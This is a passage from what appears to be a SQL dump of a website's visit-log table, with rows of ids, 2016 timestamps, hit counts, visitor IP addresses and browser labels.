149','other'),(59185,1472400929,1,1,0,0,'91.196.178.35','chrome'),(59186,1472401108,1,1,0,0,'51.255.65.4','other'),(59187,1472401171,1,1,0,0,'51.255.65.52','other'),(59188,1472402474,1,1,0,0,'46.133.103.170','other'),(59189,1472403337,1,1,0,0,'164.132.161.92','other'),(59190,1472403341,1,1,0,0,'164.132.161.71','other'),(59191,1472403745,1,1,0,0,'51.255.65.45','other'),(59192,1472403757,1,1,0,0,'164.132.161.74','other'),(59193,1472405657,1,1,0,0,'164.132.161.57','other'),(59194,1472406047,1,1,0,0,'51.255.65.59','other'),(59195,1472406808,1,1,0,0,'164.132.161.39','other'),(59196,1472407475,1,1,0,0,'51.255.65.33','other'),(59197,1472407689,1,0,1,0,'68.180.230.178',''),(59198,1472407976,1,1,0,0,'164.132.161.93','other'),(59199,1472408184,1,1,0,0,'91.196.178.103','chrome'),(59200,1472409222,1,1,0,0,'164.132.161.76','other'),(59201,1472409439,1,1,0,0,'164.132.161.70','other'),(59202,1472409552,1,1,0,0,'51.255.65.18','other'),(59203,1472409786,2,2,0,0,'149.202.54.50','other'),(59204,1472409949,2,2,0,0,'213.239.205.207','other'),(59205,1472410823,1,1,0,0,'193.194.127.219','other'),(59206,1472411158,1,1,0,0,'130.180.217.76','chrome'),(59207,1472411688,1,1,0,0,'141.0.12.191','other'),(59208,1472411903,1,1,0,0,'164.132.161.13','other'),(59209,1472412214,1,1,0,0,'51.255.65.16','other'),(59210,1472412423,1,1,0,0,'51.255.65.87','other'),(59211,1472413043,1,1,0,0,'51.255.65.13','other'),(59212,1472414108,1,1,0,0,'164.132.161.96','other'),(59213,1472414146,1,1,0,0,'164.132.161.43','other'),(59214,1472414726,1,1,0,0,'40.77.167.35','other'),(59215,1472414803,1,1,0,0,'91.196.178.68','chrome'),(59216,1472415630,1,1,0,0,'91.124.108.215','chrome'),(59217,1472415680,1,1,0,0,'207.46.13.193','other'),(59218,1472415742,1,1,0,0,'51.255.65.92','other'),(59219,1472416024,1,1,0,0,'164.132.161.15','other'),(59220,1472416332,19,19,0,0,'98.218.34.60','other'),(59221,1472416909,1,1,0,0,'51.255.65.59','other'),(59222,1472417118,1,1,0,0,'180.76.15.10','other'),(59223,1472417486,1,1,0,0,'51.255.65.87','other'),(59224,1472418212,1,1,0,0,'157.55.39.227','other'),(59225,1472418480,1,1,0,0,'164.132.161.72','other'),(59226,1472418608,1,1,0,0,'51.255.65.13','other'),(59227,1472418735,1,1,0,0,'157.55.39.225','other'),(59228,1472419128,1,1,0,0,'180.76.15.148','other'),(59229,1472419296,1,1,0,0,'164.132.161.18','other'),(59230,1472420391,1,1,0,0,'130.193.50.34','other'),(59231,1472420834,1,1,0,0,'40.77.167.35','other'),(59232,1472421434,4,4,0,0,'142.54.184.90','other'),(59233,1472421786,1,1,0,0,'164.132.161.85','other'),(59234,1472421862,1,1,0,0,'164.132.161.22','other'),(59235,1472422852,1,1,0,0,'164.132.161.66','other'),(59236,1472423224,1,1,0,0,'51.255.65.12','other'),(59237,1472423257,1,1,0,0,'178.154.189.31','other'),(59238,1472423329,1,1,0,0,'207.46.13.169','other'),(59239,1472424409,1,1,0,0,'51.255.65.51','other'),(59240,1472425642,1,1,0,0,'141.8.183.25','other'),(59241,1472428189,1,0,1,0,'68.180.230.178',''),(59242,1472428394,2,2,0,0,'164.132.161.68','other'),(59243,1472430992,1,1,0,0,'51.255.65.37','other'),(59244,1472431476,1,1,0,0,'51.255.65.73','other'),(59245,1472431752,1,1,0,0,'180.76.15.156','other'),(59246,1472431918,1,1,0,0,'51.255.65.21','other'),(59247,1472432256,1,1,0,0,'164.132.161.50','other'),(59248,1472432346,1,1,0,0,'51.255.65.18','other'),(59249,1472432476,1,1,0,0,'164.132.161.43','other'),(59250,1472433184,1,1,0,0,'51.255.65.23','other'),(59251,1472433633,18,18,0,0,'151.80.44.115','other'),(59252,1472433857,1,1,0,0,'164.132.161.85','other'),(59253,1472433994,1,1,0,0,'178.154.189.37','other'),(59254,1472434178,1,1,0,0,'164.132.161.10','other'),(59255,1472435125,1,1,0,0,'51.255.65.15','other'),(59256,1472435415,1,1,0,0,'164.132.161.50','other'),(59257,1472435844,1,1,0,0,'51.255.65.88','other'),(59258,1472436001,1,1,0,0,'51.255.65.18','other'),(59259,1472436374,1,1,0,0,'164.132.161.65','other'),(59260,1472436571,1,1,0,0,'51.255.65.32','other'),(59261,1472437383,1,1,0,0,'51.255.65.72','other'),(59262,1472437393,1,1,0,0,'164.132.161.9','other'),(59263,1472437633,1,1,0,0,'51.255.65.59','other'),(59264,1472438015,1,1,0,0,'51.255.65.97','other'),(59265,1472438997,1,1,0,0,'51.255.65.81','other'),(59266,1472439077,1,1,0,0,'51.255.65.26','other'),(59267,1472440257,1,1,0,0,'51.255.65.56','other'),(59268,1472440340,1,1,0,0,'51.255.65.22','other'),(59269,1472440802,1,1,0,0,'51.255.65.83','other'),(59270,1472440971,1,1,0,0,'207.46.13.193','other'),(59271,1472442056,1,1,0,0,'189.13.185.23','firefox'),(59272,1472442081,1,1,0,0,'5.255.250.41','other'),(59273,1472442267,1,1,0,0,'164.132.161.91','other'),(59274,1472442586,1,1,0,0,'207.46.13.193','other'),(59275,1472442801,1,0,1,0,'68.180.230.178',''),(59276,1472442879,1,1,0,0,'164.132.161.6','other'),(59277,1472443698,1,1,0,0,'164.132.161.61','other'),(59278,1472443719,1,1,0,0,'51.255.65.77','other'),(59279,1472443866,1,1,0,0,'51.255.65.33','other'),(59280,1472443909,1,1,0,0,'51.255.65.57','other'),(59281,1472444010,1,1,0,0,'164.132.161.77','other'),(59282,1472445019,1,1,0,0,'164.132.161.25','other'),(59283,1472445224,1,1,0,0,'164.132.161.52','other'),(59284,1472446590,1,1,0,0,'157.55.39.32','other'),(59285,1472446653,1,1,0,0,'51.255.65.25','other'),(59286,1472446708,1,1,0,0,'178.137.131.231','chrome'),(59287,1472446734,3,3,0,0,'141.95.0.57','other'),(59288,1472448651,1,1,0,0,'89.98.141.205','other'),(59289,1472448819,1,1,0,0,'66.102.9.103','chrome'),(59290,1472449054,1,1,0,0,'51.255.65.63','other'),(59291,1472449092,1,1,0,0,'164.132.161.18','other'),(59292,1472449970,1,1,0,0,'91.196.178.103','chrome'),(59293,1472449981,1,1,0,0,'217.196.168.65','chrome'),(59294,1472450569,1,1,0,0,'51.255.65.4','other'),(59295,1472450588,1,1,0,0,'164.132.161.15','other'),(59296,1472450660,1,1,0,0,'164.132.161.16','other'),(59297,1472451646,1,1,0,0,'51.255.65.35','other'),(59298,1472451673,1,1,0,0,'51.255.65.36','other'),(59299,1472451728,1,1,0,0,'164.132.161.37','other'),(59300,1472451935,1,1,0,0,'91.196.178.103','chrome'),(59301,1472452917,2,2,0,0,'130.180.218.115','firefox'),(59302,1472453114,1,1,0,0,'94.179.6.104','chrome'),(59303,1472453640,1,1,0,0,'141.0.13.131','opera'),(59304,1472453842,2,0,2,0,'68.180.230.178',''),(59305,1472454054,1,1,0,0,'164.132.161.30','other'),(59306,1472454164,1,1,0,0,'31.41.70.4','opera'),(59307,1472454448,1,1,0,0,'51.255.65.94','other'),(59308,1472454583,1,1,0,0,'94.178.7.164','opera'),(59309,1472454589,1,1,0,0,'93.158.152.61','other'),(59310,1472455308,1,1,0,0,'94.179.6.104','chrome'),(59311,1472455448,1,1,0,0,'51.255.65.25','other'),(59312,1472455484,1,1,0,0,'130.180.218.115','firefox'),(59313,1472456217,4,4,0,0,'130.180.216.209','firefox'),(59314,1472457217,1,1,0,0,'94.179.54.0','firefox'),(59315,1472458002,2,2,0,0,'157.55.39.32','other'),(59316,1472458143,1,1,0,0,'91.196.177.15','chrome'),(59317,1472458146,1,1,0,0,'164.132.161.48','other'),(59318,1472458462,1,1,0,0,'185.26.180.142','opera'),(59319,1472458689,1,1,0,0,'164.132.161.31','other'),(59320,1472458776,1,1,0,0,'51.255.65.17','other'),(59321,1472458927,1,1,0,0,'91.196.178.165','chrome'),(59322,1472460328,1,1,0,0,'82.145.222.131','opera'),(59323,1472460471,1,1,0,0,'164.132.161.46','other'),(59324,1472460677,1,1,0,0,'51.255.65.38','other'),(59325,1472460790,1,1,0,0,'51.255.65.27','other'),(59326,1472460895,1,1,0,0,'31.41.70.4','opera'),(59327,1472460902,1,1,0,0,'51.255.65.51','other'),(59328,1472461313,1,1,0,0,'51.255.65.96','other'),(59329,1472462426,1,1,0,0,'94.179.6.104','chrome'),(59330,1472463024,1,1,0,0,'51.255.65.38','other'),(59331,1472463176,1,1,0,0,'31.41.70.4','opera'),(59332,1472463206,1,1,0,0,'91.196.178.67','chrome'),(59333,1472463461,1,1,0,0,'37.54.2.100','firefox'),(59334,1472463482,1,1,0,0,'130.193.50.34','other'),(59335,1472464534,1,1,0,0,'91.196.178.103','chrome'),(59336,1472464671,1,1,0,0,'91.196.178.98','chrome'),(59337,1472465653,1,1,0,0,'185.26.180.171','opera'),(59338,1472465779,1,1,0,0,'94.179.6.104','chrome'),(59339,1472467464,1,1,0,0,'157.55.39.225','other'),(59340,1472468316,1,1,0,0,'141.0.13.174','opera'),(59341,1472468330,1,1,0,0,'164.132.161.83','other'),(59342,1472468660,1,1,0,0,'141.0.12.204','opera'),(59343,1472469269,1,1,0,0,'178.137.131.231','chrome'),(59344,1472469353,1,1,0,0,'180.76.15.29','other'),(59345,1472469555,1,1,0,0,'37.54.110.155','opera'),(59346,1472469684,1,0,1,0,'66.249.76.77',''),(59347,1472470408,1,1,0,0,'91.196.178.132','firefox'),(59348,1472471543,1,1,0,0,'91.196.178.65','firefox'),(59349,1472471968,1,1,0,0,'93.178.212.174','chrome'),(59350,1472472899,1,1,0,0,'94.179.6.104','chrome'),(59351,1472473281,1,1,0,0,'164.132.161.95','other'),(59352,1472473321,1,1,0,0,'91.196.178.72','firefox'),(59353,1472473790,1,1,0,0,'82.145.222.167','opera'),(59354,1472474372,1,1,0,0,'164.132.161.38','other'),(59355,1472475675,1,1,0,0,'82.145.222.167','opera'),(59356,1472476398,1,1,0,0,'91.124.227.104','firefox'),(59357,1472476822,1,1,0,0,'91.196.178.165','chrome'),(59358,1472476909,1,1,0,0,'46.133.28.83','firefox'),(59359,1472477049,1,1,0,0,'164.132.161.89','other'),(59360,1472477568,1,1,0,0,'91.124.227.104','firefox'),(59361,1472477643,1,1,0,0,'128.69.223.191','other'),(59362,1472478201,1,1,0,0,'94.179.29.38','chrome'),(59363,1472478212,99,99,0,0,'208.43.225.85','other'),(59364,1472478633,1,1,0,0,'91.196.178.65','firefox'),(59365,1472478724,68,68,0,0,'208.43.225.84','other'),(59366,1472478899,1,1,0,0,'164.132.161.29','other'),(59367,1472478901,1,1,0,0,'51.255.65.89','other'),(59368,1472479057,1,1,0,0,'51.255.65.84','other'),(59369,1472479350,1,1,0,0,'66.249.93.55','chrome'),(59370,1472479594,1,1,0,0,'164.132.161.41','other'),(59371,1472480234,1,1,0,0,'51.255.65.88','other'),(59372,1472480733,1,1,0,0,'51.255.65.25','other'),(59373,1472480840,2,0,2,0,'68.180.230.178',''),(59374,1472481229,2,2,0,0,'91.196.178.168','chrome'),(59375,1472481526,1,1,0,0,'217.77.215.236','chrome'),(59376,1472481802,1,1,0,0,'91.196.178.103','chrome'),(59377,1472481818,1,0,1,0,'66.249.76.59',''),(59378,1472482429,1,1,0,0,'51.255.65.17','other'),(59379,1472483375,1,1,0,0,'51.255.65.55','other'),(59380,1472483783,1,1,0,0,'164.132.161.4','other'),(59381,1472483931,1,1,0,0,'91.196.178.71','firefox'),(59382,1472484515,1,1,0,0,'164.132.161.80','other'),(59383,1472485049,1,1,0,0,'164.132.161.87','other'),(59384,1472485650,1,1,0,0,'164.132.161.75','other'),(59385,1472485801,1,0,1,0,'66.249.76.60',''),(59386,1472485872,1,1,0,0,'51.255.65.49','other'),(59387,1472485895,1,1,0,0,'51.255.65.26','other'),(59388,1472486222,1,1,0,0,'51.255.65.83','other'),(59389,1472487274,1,1,0,0,'51.255.65.44','other'),(59390,1472488143,1,1,0,0,'180.76.15.32','other'),(59391,1472488246,1,1,0,0,'51.255.65.64','other'),(59392,1472488386,1,1,0,0,'51.255.65.47','other'),(59393,1472488431,1,1,0,0,'92.113.175.190','firefox'),(59394,1472490110,1,1,0,0,'51.255.65.63','other'),(59395,1472490413,1,1,0,0,'77.122.175.67','chrome'),(59396,1472490644,2,2,0,0,'93.77.142.137','chrome'),(59397,1472490698,1,1,0,0,'164.132.161.33','other'),(59398,1472490830,1,1,0,0,'164.132.161.16','other'),(59399,1472490890,1,1,0,0,'178.93.150.140','chrome'),(59400,1472491245,1,1,0,0,'207.46.13.169','other'),(59401,1472491349,1,1,0,0,'164.132.161.14','other'),(59402,1472491488,1,1,0,0,'164.132.161.89','other'),(59403,1472491789,1,1,0,0,'51.255.65.34','other'),(59404,1472492630,1,1,0,0,'51.255.65.44','other'),(59405,1472494151,1,1,0,0,'51.255.65.32','other'),(59406,1472494603,1,1,0,0,'51.255.65.67','other'),(59407,1472494924,1,1,0,0,'51.255.65.71','other'),(59408,1472495263,1,1,0,0,'91.196.178.72','chrome'),(59409,1472495362,1,1,0,0,'91.196.178.103','chrome'),(59410,1472495661,1,1,0,0,'164.132.161.63','other'),(59411,1472495964,1,1,0,0,'82.145.222.142','opera'),(59412,1472496527,1,1,0,0,'194.44.177.231','chrome'),(59413,1472496695,1,1,0,0,'185.26.180.168','other'),(59414,1472496761,1,1,0,0,'51.255.65.60','other'),(59415,1472496784,1,1,0,0,'164.132.161.94','other'),(59416,1472497118,1,1,0,0,'91.196.178.103','chrome'),(59417,1472497608,1,1,0,0,'164.132.161.18','other'),(59418,1472497719,1,1,0,0,'130.193.50.34','other'),(59419,1472498115,1,1,0,0,'51.255.65.32','other'),(59420,1472498144,1,1,0,0,'51.255.65.89','other'),(59421,1472498788,2,2,0,0,'38.99.82.191','other'),(59422,1472499079,1,1,0,0,'91.196.178.68','chrome'),(59423,1472499474,1,1,0,0,'51.255.65.54','other'),(59424,1472499956,1,1,0,0,'164.132.161.92','other'),(59425,1472500238,1,0,1,0,'66.249.76.61',''),(59426,1472500317,1,1,0,0,'164.132.161.95','other'),(59427,1472500361,1,1,0,0,'51.255.65.86','other'),(59428,1472501476,1,1,0,0,'51.255.65.12','other'),(59429,1472501541,1,1,0,0,'94.179.81.140','firefox'),(59430,1472501910,7,7,0,0,'38.99.82.191','other'),(59431,1472502017,1,1,0,0,'38.99.82.192','other'),(59432,1472503220,1,1,0,0,'51.255.65.29','other'),(59433,1472503987,1,1,0,0,'51.255.65.79','other'),(59434,1472504022,1,1,0,0,'38.99.82.191','other'),(59435,1472504582,1,1,0,0,'212.115.253.150','chrome'),(59436,1472504828,1,1,0,0,'51.255.65.65','other'),(59437,1472504990,1,1,0,0,'51.255.65.66','other'),(59438,1472505235,1,1,0,0,'51.255.65.86','other'),(59439,1472505287,1,1,0,0,'207.46.13.169','other'),(59440,1472505392,1,0,1,0,'66.249.76.60',''),(59441,1472505698,1,1,0,0,'51.255.65.85','other'),(59442,1472505941,4,4,0,0,'38.99.82.191','other'),(59443,1472506170,1,1,0,0,'51.255.65.29','other'),(59444,1472506666,1,1,0,0,'207.46.13.169','other'),(59445,1472506852,12,12,0,0,'38.99.82.191','other'),(59446,1472507005,1,1,0,0,'38.99.82.192','other'),(59447,1472507041,1,1,0,0,'164.132.161.18','other'),(59448,1472507800,1,1,0,0,'164.132.161.32','other'),(59449,1472507831,3,3,0,0,'38.99.82.191','other'),(59450,1472508604,4,4,0,0,'38.99.82.192','other'),(59451,1472508809,4,4,0,0,'38.99.82.191','other'),(59452,1472509654,1,1,0,0,'38.99.82.192','other'),(59453,1472509943,6,6,0,0,'38.99.82.191','other'),(59454,1472510674,3,3,0,0,'38.99.82.192','other'),(59455,1472510907,5,5,0,0,'38.99.82.191','other'),(59456,1472511794,3,3,0,0,'38.99.82.192','other'),(59457,1472511847,6,6,0,0,'38.99.82.191','other'),(59458,1472512768,9,9,0,0,'38.99.82.191','other'),(59459,1472513681,5,5,0,0,'38.99.82.191','other'),(59460,1472513952,1,1,0,0,'164.132.161.73','other'),(59461,1472514624,3,3,0,0,'38.99.82.191','other'),(59462,1472514989,1,1,0,0,'38.99.82.192','other'),(59463,1472515757,4,4,0,0,'38.99.82.191','other'),(59464,1472516590,1,1,0,0,'164.132.161.60','other'),(59465,1472516667,5,5,0,0,'38.99.82.191','other'),(59466,1472517649,1,1,0,0,'38.99.82.192','other'),(59467,1472517883,5,5,0,0,'38.99.82.191','other'),(59468,1472517969,1,1,0,0,'51.255.65.40','other'),(59469,1472518679,1,1,0,0,'164.132.161.74','other'),(59470,1472518986,1,1,0,0,'164.132.161.50','other'),(59471,1472519024,2,2,0,0,'38.99.82.191','other'),(59472,1472519154,1,1,0,0,'38.99.82.192','other'),(59473,1472521007,1,1,0,0,'180.76.15.158','other'),(59474,1472524280,2,2,0,0,'38.99.82.191','other'),(59475,1472524345,1,1,0,0,'38.99.82.192','other'),(59476,1472524542,1,0,1,0,'66.249.76.61',''),(59477,1472525119,1,1,0,0,'51.255.65.42','other'),(59478,1472527261,1,1,0,0,'162.210.196.100','other'),(59479,1472527762,1,1,0,0,'51.255.65.48','other'),(59480,1472527911,1,1,0,0,'51.255.65.55','other'),(59481,1472528165,1,1,0,0,'66.249.76.60','chrome'),(59482,1472529218,2,2,0,0,'51.255.36.86','other'),(59483,1472529755,18,18,0,0,'195.154.187.115','other'),(59484,1472530571,1,1,0,0,'164.132.161.73','other'),(59485,1472531413,1,1,0,0,'91.244.15.22','chrome'),(59486,1472531795,1,1,0,0,'164.132.161.71','other'),(59487,1472532583,1,1,0,0,'71.180.24.53','other'),(59488,1472532752,2,2,0,0,'38.99.82.191','other'),(59489,1472533522,1,1,0,0,'164.132.161.18','other'),(59490,1472533674,1,1,0,0,'51.255.65.53','other'),(59491,1472533841,1,1,0,0,'164.132.161.6','other'),(59492,1472534055,1,1,0,0,'66.249.76.59','chrome'),(59493,1472534095,1,1,0,0,'38.99.82.192','other'),(59494,1472534229,1,1,0,0,'174.129.237.157','other'),(59495,1472534726,2,2,0,0,'38.99.82.191','other'),(59496,1472534878,1,1,0,0,'164.132.161.50','other'),(59497,1472535267,1,0,1,0,'66.249.76.61',''),(59498,1472535730,1,1,0,0,'174.129.237.157','other'),(59499,1472535775,1,1,0,0,'164.132.161.97','other'),(59500,1472536222,1,1,0,0,'38.99.82.192','other'),(59501,1472536317,1,1,0,0,'164.132.161.52','other'),(59502,1472536970,2,2,0,0,'38.99.82.191','other'),(59503,1472537812,1,1,0,0,'164.132.161.27','other'),(59504,1472538017,69,69,0,0,'94.199.151.22','other'),(59505,1472538046,1,1,0,0,'51.255.65.97','other'),(59506,1472538160,1,1,0,0,'51.255.65.47','other'),(59507,1472538369,1,1,0,0,'38.99.82.191','other'),(59508,1472538371,1,1,0,0,'51.255.65.79','other'),(59509,1472538576,1,1,0,0,'51.255.65.21','other'),(59510,1472539049,1,1,0,0,'38.99.82.192','other'),(59511,1472539125,1,1,0,0,'207.46.13.169','other'),(59512,1472539429,1,1,0,0,'51.255.65.61','other'),(59513,1472539479,1,1,0,0,'93.73.234.193','firefox'),(59514,1472539604,1,1,0,0,'91.196.177.15','chrome'),(59515,1472539953,1,1,0,0,'91.124.227.104','chrome'),(59516,1472540018,1,1,0,0,'38.99.82.191','other'),(59517,1472540154,1,1,0,0,'51.255.65.59','other'),(59518,1472541650,1,1,0,0,'51.255.65.69','other'),(59519,1472542367,1,1,0,0,'51.255.65.10','other'),(59520,1472542639,1,1,0,0,'164.132.161.4','other'),(59521,1472542705,1,0,1,0,'68.180.230.222',''),(59522,1472543057,1,1,0,0,'78.111.185.34','chrome'),(59523,1472543129,1,1,0,0,'164.132.161.18','other'),(59524,1472544548,1,1,0,0,'207.46.13.169','other'),(59525,1472544661,1,1,0,0,'78.111.185.34','chrome'),(59526,1472544790,1,1,0,0,'38.99.82.191','other'),(59527,1472545024,1,1,0,0,'51.255.65.75','other'),(59528,1472545062,3,3,0,0,'130.193.51.19','other'),(59529,1472545266,17,17,0,0,'5.9.111.70','other'),(59530,1472545353,1,1,0,0,'141.8.142.61','other'),(59531,1472545361,1,1,0,0,'141.8.183.25','other'),(59532,1472545404,1,1,0,0,'141.8.142.58','other'),(59533,1472545791,1,1,0,0,'51.255.65.49','other'),(59534,1472545848,1,1,0,0,'91.196.178.168','chrome'),(59535,1472546610,1,1,0,0,'77.222.140.6','firefox'),(59536,1472546915,1,1,0,0,'51.255.65.78','other'),(59537,1472547163,1,1,0,0,'31.41.70.4','opera'),(59538,1472547453,1,1,0,0,'91.196.178.168','chrome'),(59539,1472547474,1,1,0,0,'91.196.178.70','firefox'),(59540,1472547494,1,1,0,0,'5.255.253.47','other'),(59541,1472547919,1,1,0,0,'91.196.178.65','chrome'),(59542,1472547927,1,1,0,0,'51.255.65.70','other'),(59543,1472548060,1,1,0,0,'164.132.161.60','other'),(59544,1472548399,1,1,0,0,'164.132.161.40','other'),(59545,1472548669,1,1,0,0,'91.196.178.72','firefox'),(59546,1472548959,1,1,0,0,'164.132.161.92','other'),(59547,1472550418,1,1,0,0,'91.196.177.15','chrome'),(59548,1472550491,1,1,0,0,'130.180.211.102','chrome'),(59549,1472550812,1,1,0,0,'164.132.161.63','other'),(59550,1472550858,1,1,0,0,'164.132.161.72','other'),(59551,1472551034,1,1,0,0,'164.132.161.18','other'),(59552,1472551363,1,1,0,0,'164.132.161.59','other'),(59553,1472551544,1,1,0,0,'37.53.89.22','chrome'),(59554,1472552527,1,1,0,0,'164.132.161.20','other'),(59555,1472553577,1,1,0,0,'164.132.161.47','other'),(59556,1472553859,1,1,0,0,'164.132.161.21','other'),(59557,1472553912,1,1,0,0,'51.255.65.82','other'),(59558,1472554278,1,1,0,0,'51.255.65.7','other'),(59559,1472554662,1,1,0,0,'164.132.161.5','other'),(59560,1472554954,1,1,0,0,'164.132.161.58','other'),(59561,1472555880,1,1,0,0,'164.132.161.20','other'),(59562,1472556028,1,1,0,0,'91.196.178.66','firefox'),(59563,1472556225,1,1,0,0,'94.179.0.191','firefox'),(59564,1472556236,1,1,0,0,'91.196.178.65','firefox'),(59565,1472556689,1,1,0,0,'164.132.161.34','other'),(59566,1472557601,1,1,0,0,'180.76.15.17','other'),(59567,1472558018,1,1,0,0,'51.255.65.35','other'),(59568,1472558086,1,0,1,0,'66.249.76.59',''),(59569,1472558639,1,1,0,0,'38.99.82.191','other'),(59570,1472559063,1,1,0,0,'51.255.65.77','other'),(59571,1472559321,1,1,0,0,'164.132.161.38','other'),(59572,1472559322,1,1,0,0,'51.255.65.61','other'),(59573,1472559356,1,1,0,0,'31.41.70.4','opera'),(59574,1472559610,1,1,0,0,'180.76.15.32','other'),(59575,1472559788,1,1,0,0,'94.179.0.191','firefox'),(59576,1472560245,1,1,0,0,'164.132.161.30','other'),(59577,1472561128,1,0,1,0,'66.249.76.61',''),(59578,1472561141,1,1,0,0,'78.137.4.163','firefox'),(59579,1472561556,1,1,0,0,'51.255.65.5','other'),(59580,1472561718,1,1,0,0,'164.132.161.20','other'),(59581,1472562109,1,1,0,0,'195.230.140.242','chrome'),(59582,1472562539,1,1,0,0,'164.132.161.29','other'),(59583,1472562626,1,1,0,0,'51.255.65.3','other'),(59584,1472563155,1,1,0,0,'164.132.161.26','other'),(59585,1472563368,1,1,0,0,'207.46.13.169','other'),(59586,1472563908,1,0,1,0,'66.249.76.60',''),(59587,1472564180,1,1,0,0,'31.41.70.4','opera'),(59588,1472564458,1,1,0,0,'51.255.65.28','other'),(59589,1472564543,1,1,0,0,'91.196.178.65','firefox'),(59590,1472565386,1,1,0,0,'164.132.161.77','other'),(59591,1472565492,1,1,0,0,'51.255.65.29','other'),(59592,1472565819,1,1,0,0,'164.132.161.73','other'),(59593,1472566398,1,1,0,0,'207.46.13.95','other'),(59594,1472566989,1,1,0,0,'91.196.178.65','firefox'),(59595,1472567082,1,1,0,0,'202.28.10.20','chrome'),(59596,1472567527,1,1,0,0,'38.99.82.191','other'),(59597,1472567561,1,1,0,0,'94.179.81.140','firefox'),(59598,1472568523,1,0,1,0,'66.249.76.79',''),(59599,1472569769,1,1,0,0,'91.196.178.100','chrome'),(59600,1472570558,1,0,1,0,'66.249.76.60',''),(59601,1472570971,1,1,0,0,'38.99.82.191','other'),(59602,1472571136,1,1,0,0,'51.255.65.46','other'),(59603,1472572163,1,0,1,0,'66.249.76.59',''),(59604,1472572635,1,1,0,0,'51.255.65.67','other'),(59605,1472572881,1,1,0,0,'164.132.161.42','other'),(59606,1472573036,1,1,0,0,'51.255.65.5','other'),(59607,1472573284,1,1,0,0,'51.255.65.12','other'),(59608,1472573303,1,1,0,0,'91.196.178.102','firefox'),(59609,1472573342,1,0,1,0,'66.249.76.79',''),(59610,1472573349,1,1,0,0,'207.46.13.169','other'),(59611,1472573398,1,1,0,0,'66.249.66.87','chrome'),(59612,1472573448,1,1,0,0,'66.249.76.77','chrome'),(59613,1472573461,1,1,0,0,'164.132.161.39','other'),(59614,1472573746,1,1,0,0,'93.158.152.84','other'),(59615,1472573748,1,1,0,0,'5.255.253.67','other'),(59616,1472574339,1,1,0,0,'164.132.161.22','other'),(59617,1472574649,1,1,0,0,'38.99.82.192','other'),(59618,1472576990,1,1,0,0,'51.255.65.15','other'),(59619,1472578032,1,1,0,0,'51.255.65.13','other'),(59620,1472578582,1,0,1,0,'66.249.76.59',''),(59621,1472579469,1,1,0,0,'164.132.161.84','other'),(59622,1472579567,1,1,0,0,'51.255.65.47','other'),(59623,1472579921,1,1,0,0,'51.255.65.76','other'),(59624,1472580074,1,1,0,0,'164.132.161.3','other'),(59625,1472580204,1,1,0,0,'38.99.82.192','other'),(59626,1472581518,1,1,0,0,'164.132.161.86','other'),(59627,1472581584,1,1,0,0,'51.255.65.97','other'),(59628,1472582313,1,1,0,0,'164.132.161.89','other'),(59629,1472582911,1,1,0,0,'91.196.178.103','chrome'),(59630,1472583394,1,1,0,0,'164.132.161.77','other'),(59631,1472584121,1,1,0,0,'51.255.65.55','other'),(59632,1472584354,1,1,0,0,'207.46.13.169','other'),(59633,1472584556,1,1,0,0,'178.92.8.5','firefox'),(59634,1472585463,1,1,0,0,'51.255.65.72','other'),(59635,1472586423,1,1,0,0,'51.255.65.71','other'),(59636,1472586889,1,1,0,0,'164.132.161.86','other'),(59637,1472587374,1,1,0,0,'180.76.15.137','other'),(59638,1472587476,1,1,0,0,'51.255.65.57','other'),(59639,1472589868,1,1,0,0,'82.145.221.231','other'),(59640,1472589989,1,1,0,0,'51.255.65.16','other'),(59641,1472591960,1,1,0,0,'207.46.13.169','other'),(59642,1472592222,1,1,0,0,'51.255.65.20','other'),(59643,1472592364,1,1,0,0,'164.132.161.70','other'),(59644,1472592424,1,1,0,0,'178.150.235.25','chrome'),(59645,1472592649,2,0,2,0,'68.180.230.178',''),(59646,1472592681,1,1,0,0,'164.132.161.67','other'),(59647,1472593530,1,1,0,0,'157.55.39.225','other'),(59648,1472593658,1,0,1,0,'68.180.230.178',''),(59649,1472593725,1,1,0,0,'51.255.65.79','other'),(59650,1472593886,1,0,1,0,'66.249.76.61',''),(59651,1472593964,1,1,0,0,'188.32.23.164','opera'),(59653,1472593968,1,1,0,0,'128.68.30.127','opera'),(59654,1472594475,1,1,0,0,'164.132.161.29','other'),(59655,1472594529,1,1,0,0,'51.255.65.35','other'),(59656,1472595027,1,0,1,0,'66.249.76.79',''),(59657,1472595323,1,1,0,0,'164.132.161.61','other'),(59658,1472595442,1,1,0,0,'51.255.65.62','other'),(59659,1472595869,1,0,1,0,'66.249.76.61',''),(59660,1472596188,1,1,0,0,'157.55.39.208','other'),(59661,1472596251,1,1,0,0,'164.132.161.60','other'),(59662,1472596395,1,1,0,0,'62.16.5.70','chrome'),(59663,1472597035,1,1,0,0,'38.99.82.192','other'),(59664,1472597036,2,2,0,0,'38.99.82.191','other'),(59665,1472597337,1,1,0,0,'51.255.65.90','other'),(59666,1472597646,1,1,0,0,'51.255.65.97','other'),(59667,1472597805,1,1,0,0,'51.255.65.80','other'),(59668,1472598218,1,1,0,0,'180.76.15.163','other'),(59669,1472598232,1,0,1,0,'66.249.76.59',''),(59670,1472598387,1,0,1,0,'66.249.76.61',''),(59671,1472600682,1,1,0,0,'164.132.161.69','other'),(59672,1472600779,1,0,1,0,'66.249.76.59',''),(59673,1472601008,1,0,1,0,'66.249.76.60',''),(59674,1472601366,1,1,0,0,'164.132.161.73','other'),(59675,1472601367,1,1,0,0,'51.255.65.77','other'),(59676,1472601655,1,1,0,0,'38.99.82.192','other'),(59677,1472602082,1,0,1,0,'68.180.230.178',''),(59678,1472602871,1,1,0,0,'164.132.161.75','other'),(59679,1472603522,2,2,0,0,'38.99.82.191','other'),(59680,1472603568,1,0,1,0,'66.249.76.77',''),(59681,1472604852,1,0,1,0,'66.249.76.59',''),(59682,1472605495,1,1,0,0,'38.99.82.191','other'),(59683,1472605632,1,0,1,0,'66.249.76.60',''),(59684,1472609137,1,0,1,0,'66.249.76.59',''),(59685,1472609438,1,1,0,0,'38.99.82.191','other'),(59686,1472612151,1,0,1,0,'68.180.230.178',''),(59687,1472612584,1,1,0,0,'66.249.76.60','chrome'),(59688,1472612913,1,1,0,0,'64.246.165.210','firefox'),(59689,1472614322,1,0,1,0,'66.249.76.61',''),(59690,1472614542,1,1,0,0,'207.46.13.169','other'),(59691,1472614654,1,1,0,0,'38.99.82.192','other'),(59692,1472616063,1,0,1,0,'66.249.76.77',''),(59693,1472616655,1,0,1,0,'66.249.76.79',''),(59694,1472616723,4,4,0,0,'51.255.194.3','other'),(59695,1472616825,1,0,1,0,'66.249.76.60',''),(59696,1472618070,1,1,0,0,'94.179.122.254','firefox'),(59697,1472619222,1,0,1,